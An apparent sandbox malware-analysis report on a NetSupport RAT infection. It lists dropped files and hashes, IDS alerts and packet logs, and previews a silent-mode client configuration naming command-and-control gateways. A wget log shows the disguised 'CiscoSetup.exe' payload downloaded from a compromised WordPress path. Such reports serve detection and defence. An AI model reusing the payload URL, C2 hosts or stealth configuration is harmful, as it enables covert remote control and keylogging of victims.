                                                                                                                                                                                                  SHA-512:A785D390C7E066628C9894302CA10AC21BA79D9988523D5ABCB960870A39112D01984A86CDE0BCD3862D46D82696E35BA760D96A389C96553ECB1DB9C3A0D97D
                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                  Yara Hits:
                                                                                                                                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Roaming\Cisco\PCICL32.DLL, Author: Joe Security
                                                                                                                                                                                                  • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: C:\Users\user\AppData\Roaming\Cisco\PCICL32.DLL, Author: Joe Security
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):459760
                                                                                                                                                                                                  Entropy (8bit):6.678291257338415
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:12288:suqhtvbez3wj9AP8Ah0DAmlse99fow3/qkxf5iJg0nTUtnTvm:s3htk/eHoJktEKITUFTvm
                                                                                                                                                                                                  MD5:69F72AD2DAD99FF0FBC7F2C671523014
                                                                                                                                                                                                  SHA1:8AAAB0955014B89CA794A51DD527D3AFE6F38A94
                                                                                                                                                                                                  SHA-256:23F17CC168CC82B8AE16F3FC041D4465E1B12E66DCAC1713F582F99303A740DD
                                                                                                                                                                                                  SHA-512:EA18D92790F52405027666B7501CF908426B9B57FEC4157A45D86387D50324E414644245269DC1A0567B27C6C4B7C4B323D692BF449ADD4797DFCD7101531349
                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                  Yara Hits:
                                                                                                                                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Roaming\Cisco\TCCTL32.DLL, Author: Joe Security
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):121304
                                                                                                                                                                                                  Entropy (8bit):6.150456878585649
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:Wm8j0+RvW6XhBBxUcnRWIDDDDDDDDDDDDDDDDADDDDDDDDDDDDDDDDDDDDDDXDJg:WbpvWiLniepfxP91/bQxEj
                                                                                                                                                                                                  MD5:4F2D0F4A5BA798FA9E85379C7C4BD36E
                                                                                                                                                                                                  SHA1:E533F2318D232EF3E1B22BDD1D6B61C081C6D6EB
                                                                                                                                                                                                  SHA-256:AAA12A1AD8C748FBFD4C8F2E5023EC3481B18CB088B28737FC7E665163CFF41D
                                                                                                                                                                                                  SHA-512:4C338E4F87F5AC9E9339E663739B021F06D8EE48F7A5981CCDF85029888964E3C416331C7EC791933A6B3D56EC44BB3719A38039F625A25B86BA0264E3D2D609
                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                  Yara Hits:
                                                                                                                                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Roaming\Cisco\client32.exe, Author: Joe Security
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):638
                                                                                                                                                                                                  Entropy (8bit):5.396410176198281
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:12:kA2yTumGSqX4Ba/vpVSxOZ7zH+SHCPfu8AeCYubluxWkdcJPPGY:kttm18mxONeSorbu8eJ3f
                                                                                                                                                                                                  MD5:74BEF725496CD35EEB6F6B94E1EDDDFD
                                                                                                                                                                                                  SHA1:616AB761A1429E982062009B5C319F796A60BA1B
                                                                                                                                                                                                  SHA-256:8E016CA1A0837CA5F7D87656FE4153ED8639D33ADBEE9B07A3D033DB44EEC2A7
                                                                                                                                                                                                  SHA-512:C7DCFF6FF56DE463B5AB4CE89A9C6BFE5A021CABF959DA1AEF6D0DF19FA22376BD1D30749AD7A95315078F8007AF496DE3754A26A8C6C15294F31982E4F945B1
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:0x562f5eff....[Client].._present=1..DisableReplayMenu=1..SecurityKey2=dgAAAFOeoOz0f0kq5efuvoPnH(MA..Protocols=3..SOS_RShift=0..DisableChat=1..Shared=1..ValidAddresses.TCP=*..silent=1..AlwaysOnTop=0..SOS_Alt=0..DisableMessage=1..SOS_LShift=0..DisableRequestHelp=1..SysTray=0..UnloadMirrorOnDisconnect=0..DisableChatMenu=1..DisableDisconnect=1..AutoICFConfig=1..Usernames=*....[_License]..quiet=1....[_Info]..Filename=C:\Users\Public\Pictures\client32-U.ini....[General]..BeepUsingSpeaker=0....[HTTP]..CMPI=60..GatewayAddress=payiki.com:443..GSK=FN9L=MBNHG;C=P@FFA;P?DAI9F<F..Port=443..SecondaryGateway=anyhowdo.com:443..SecondaryPort=443..
                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):773968
                                                                                                                                                                                                  Entropy (8bit):6.901559811406837
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:12288:nMmCy3nAgPAxN9ueqix/HEmxsvGrif8ZSy+rdQw2QRAtd74/vmYK6H3BVoe3z:MmCy3KxW3ixPEmxsvGrm8Z6r+JQPzV7z
                                                                                                                                                                                                  MD5:0E37FBFA79D349D672456923EC5FBBE3
                                                                                                                                                                                                  SHA1:4E880FC7625CCF8D9CA799D5B94CE2B1E7597335
                                                                                                                                                                                                  SHA-256:8793353461826FBD48F25EA8B835BE204B758CE7510DB2AF631B28850355BD18
                                                                                                                                                                                                  SHA-512:2BEA9BD528513A3C6A54BEAC25096EE200A4E6CCFC2A308AE9CFD1AD8738E2E2DEFD477D59DB527A048E5E9A4FE1FC1D771701DE14EF82B4DBCDC90DF0387630
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Windows setup INFormation
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):328
                                                                                                                                                                                                  Entropy (8bit):4.93007757242403
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:6:a0S880EeLL6sWqYFcf8KYFEAy1JoHBIr2M2OIAXFYJKRLIkg/LH2yi9vyifjBLWh:JShNvPG1JoHBx2XFhILH4Burn
                                                                                                                                                                                                  MD5:26E28C01461F7E65C402BDF09923D435
                                                                                                                                                                                                  SHA1:1D9B5CFCC30436112A7E31D5E4624F52E845C573
                                                                                                                                                                                                  SHA-256:D96856CD944A9F1587907CACEF974C0248B7F4210F1689C1E6BCAC5FED289368
                                                                                                                                                                                                  SHA-512:C30EC66FECB0A41E91A31804BE3A8B6047FC3789306ADC106C723B3E5B166127766670C7DA38D77D3694D99A8CDDB26BC266EE21DBA60A148CDF4D6EE10D27D7
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:; nskbfltr.inf..;..; NS Keyboard Filter..; ..;..; This inf file installs the WDF Framework binaries....[Version]..Signature="$Windows NT$"..Provider=NSL......;..;--- nskbfltr Coinstaller installation ------..;......[nskbfltr.NT.Wdf]..KmdfService = nskbfltr, nskbfltr_wdfsect....[nskbfltr_wdfsect]..KmdfLibraryVersion = 1.5......
                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):46
                                                                                                                                                                                                  Entropy (8bit):4.532048032699691
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3:lsylULyJGI6csM:+ocyJGIPsM
                                                                                                                                                                                                  MD5:3BE27483FDCDBF9EBAE93234785235E3
                                                                                                                                                                                                  SHA1:360B61FE19CDC1AFB2B34D8C25D8B88A4C843A82
                                                                                                                                                                                                  SHA-256:4BFA4C00414660BA44BDDDE5216A7F28AECCAA9E2D42DF4BBFF66DB57C60522B
                                                                                                                                                                                                  SHA-512:EDBE8CF1CBC5FED80FEDF963ADE44E08052B19C064E8BCA66FA0FE1B332141FBE175B8B727F8F56978D1584BAAF27D331947C0B3593AAFF5632756199DC470E5
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:[COMMON]..Storage_Enabled=0..Debug_Level=0....
                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):33144
                                                                                                                                                                                                  Entropy (8bit):6.737780491933496
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:FFvNhAyi5hHA448qZkSn+EgT8To1iTYiu:FCyoHA448qSSzgI2GQ
                                                                                                                                                                                                  MD5:DCDE2248D19C778A41AA165866DD52D0
                                                                                                                                                                                                  SHA1:7EC84BE84FE23F0B0093B647538737E1F19EBB03
                                                                                                                                                                                                  SHA-256:9074FD40EA6A0CAA892E6361A6A4E834C2E51E6E98D1FFCDA7A9A537594A6917
                                                                                                                                                                                                  SHA-512:C5D170D420F1AEB9BCD606A282AF6E8DA04AE45C83D07FAAACB73FF2E27F4188B09446CE508620124F6D9B447A40A23620CFB39B79F02B04BB9E513866352166
                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                  Yara Hits:
                                                                                                                                                                                                  • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Roaming\Cisco\pcicapi.dll, Author: Joe Security
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):72584
                                                                                                                                                                                                  Entropy (8bit):6.671736046146569
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:1536:0fanvXuNOwphKuyUHTqYXHhrXH4xLIyqxoiuwbioQ+Dwajduw9tQ+8iAAe:+anPSpAFUzt0xLIyqVD9njdFyDAe
                                                                                                                                                                                                  MD5:2A2FC166269EFE48D61CB1AB92215DC2
                                                                                                                                                                                                  SHA1:A5679174D941919BAF764F94640994C01D695625
                                                                                                                                                                                                  SHA-256:73A522D9FFA9235FE2B6FD1059C551F8022437EC0EEF62EBC07240158F84A2A6
                                                                                                                                                                                                  SHA-512:13F76217664056D1FBB106820A3A7E3F44E81CD373C812E89BD6D315AC2A188A8140E0EC0A7BDA02BE62AFAB86F8962340E5889C6BBE36305C96D700871F9E1E
                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):2275903
                                                                                                                                                                                                  Entropy (8bit):7.997003172118591
                                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                                  SSDEEP:49152:StY8YsXuUchyrrP04n5YQIQNtV8CyU7XBffG4ABLOdPY:v8Ysa8PDcQNtVzyc2JlOVY
                                                                                                                                                                                                  MD5:C56A7DCC8C1658FA154501AC0819BA7E
                                                                                                                                                                                                  SHA1:DF1910FF30AA8B64808B7BD7A6558FBFCF731A9A
                                                                                                                                                                                                  SHA-256:D43244539E6F2D18177BD4AEFA92D75F4DCA197B82D01E9D5B6065D501611AE6
                                                                                                                                                                                                  SHA-512:AA06D0B61B163B35B99DC7EDB61655BCB4D9B4C909E3EEBD0D4F587A9CEE8DE8FFD2A0E9FCA44E382D076AF2502EE962D73CD572BE39E8A35ABCFEDB0B386A96
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                  Category:modified
                                                                                                                                                                                                  Size (bytes):26020
                                                                                                                                                                                                  Entropy (8bit):2.2476892905217682
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:peTlrQoyJHNMnqlABUXvr3TwKUZZMHOEid0u:GlOkqlUUXvr3TbOE40u
                                                                                                                                                                                                  MD5:AE05BE0595EEDB094F4495C844DDBFC4
                                                                                                                                                                                                  SHA1:F486E75025ED048BBEC678058FBB971D35396214
                                                                                                                                                                                                  SHA-256:5E2993F202BD04B1F9C71EB9B227F4CC807827DB4E2E8F105196FBE074C15C98
                                                                                                                                                                                                  SHA-512:76F5FA0E53CAC062E26761AFB67F7C207CEE1698A9028D4EA3FD3B6713ABB23C0064788D03D776BCB61AEA7780623B9E9B832EB43A12AD3725A49267192DB296
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:--2024-10-31 13:05:19-- https://asknetsupertech.com/wp-content/plugins/elementor/app/modules/site-editor/CiscoSetup.exe..Resolving asknetsupertech.com (asknetsupertech.com)... 54.37.62.77..Connecting to asknetsupertech.com (asknetsupertech.com)|54.37.62.77|:443... connected...HTTP request sent, awaiting response... 200 OK..Length: 16877888 (16M) [application/x-msdownload]..Saving to: 'C:/Users/user/Desktop/download/CiscoSetup.exe'.... 0K .......... .......... .......... .......... .......... 0% 139K 1m58s.. 50K .......... .......... .......... .......... .......... 0% 291K 87s.. 100K .......... .......... .......... .......... .......... 0% 2.61M 60s.. 150K .......... .......... .......... .......... .......... 1% 304K 58s.. 200K .......... .......... .......... .......... .......... 1% 1.79M 48s.. 250K .......... .......... .......... .......... .......... 1% 2.05M 41s.. 300K .......... .......... .......... .......... .......... 2% 2.03M 36s.. 350K ...
                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\wget.exe
                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):16877888
                                                                                                                                                                                                  Entropy (8bit):7.977972473710182
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:393216:PexFZAWTc+MZ3mOvSY6oDXtVVFOzWt8zLDVi:+AL+WmOvS9qDSzHzL0
                                                                                                                                                                                                  MD5:91F7229586DF2C577A54AD0D1A5BDCB1
                                                                                                                                                                                                  SHA1:938B4DDF983E035130A7FCBF0458C4F9D5B69CA5
                                                                                                                                                                                                  SHA-256:80F7768CBF016AE16F5758E31D9EB2D277C0566654F05BAD152ECBDE6EB616E5
                                                                                                                                                                                                  SHA-512:089EC05F751306B994EB1265245961C2F51B89679F4B70C08A0404FCFD7D6D6DEEC8133EE5F3F04E82D7272EC4C95BEE3859FA9C74BE0B96966C569FEF258C0E
                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  No static file info
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-10-31T18:05:13.649480+0100 | 2827745 | ETPRO MALWARE NetSupport RAT CnC Activity | 1 | 192.168.11.20 | 49756 | 151.236.16.15 | 443 | TCP
2024-10-31T18:05:13.649480+0100 | 2827745 | ETPRO MALWARE NetSupport RAT CnC Activity | 1 | 192.168.11.20 | 49758 | 199.188.200.195 | 443 | TCP
2024-10-31T18:05:21.486338+0100 | 2021697 | ET MALWARE EXE Download Request To Wordpress Folder Likely Malicious | 1 | 192.168.11.20 | 49755 | 54.37.62.77 | 443 | TCP
                                                                                                                                                                                                  Oct 31, 2024 18:05:21.114115953 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:21.114476919 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:21.116076946 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:21.160013914 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:21.486339092 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:21.539391994 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:21.657820940 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:21.657834053 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:21.657905102 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:21.657917976 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:21.657989025 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:21.658030033 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:21.658190966 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:21.658202887 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:21.658202887 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:21.658202887 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:21.658401966 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:21.658592939 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:21.658632994 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:21.658799887 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:21.658899069 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:21.658920050 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:21.659106016 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:21.828752995 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:21.828843117 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:21.828979015 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:21.828979015 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:21.829022884 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:21.829040051 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:21.829040051 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:21.829195023 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:21.846904993 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:21.846985102 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:21.847121000 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:21.847121000 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:21.847160101 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:21.847181082 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:21.847181082 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:21.847337961 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:21.847841978 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:21.847912073 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:21.848087072 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:21.848087072 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:21.848087072 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:21.848155975 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:21.848172903 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:21.848391056 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.012516975 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.012598038 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.012738943 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.012738943 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.012803078 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.012837887 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.012837887 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.012996912 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.013416052 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.013475895 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.013662100 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.013663054 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.013717890 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.013741016 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.013935089 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.014075041 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.014152050 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.014297009 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.014297009 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.014337063 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.014360905 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.014416933 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.014502048 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.019241095 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.019311905 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.019541979 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.019583941 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.019757032 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.020149946 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.020226002 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.020370960 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.020371914 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.020431042 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.020450115 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.020621061 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.020934105 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.020992994 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.021181107 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.021181107 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.021229982 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.021308899 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.021435976 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.022469997 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.171777010 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.171858072 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.172053099 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.172054052 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.172054052 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.172116995 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.172146082 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.172403097 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.197653055 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.197737932 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.197923899 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.197925091 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.197981119 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.198004007 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.198225975 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.198762894 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.198843002 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.463040113 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.463175058 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.463175058 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.463175058 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.463238955 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.463258982 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.463258982 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.463433981 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.463984966 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.464052916 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.464169025 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.464169025 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.464231014 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.464354992 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.464431047 CET49755443192.168.11.2054.37.62.77
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.465049982 CET4434975554.37.62.77192.168.11.20
                                                                                                                                                                                                  Oct 31, 2024 18:05:22.465117931 CET4434975554.37.62.77192.168.11.20
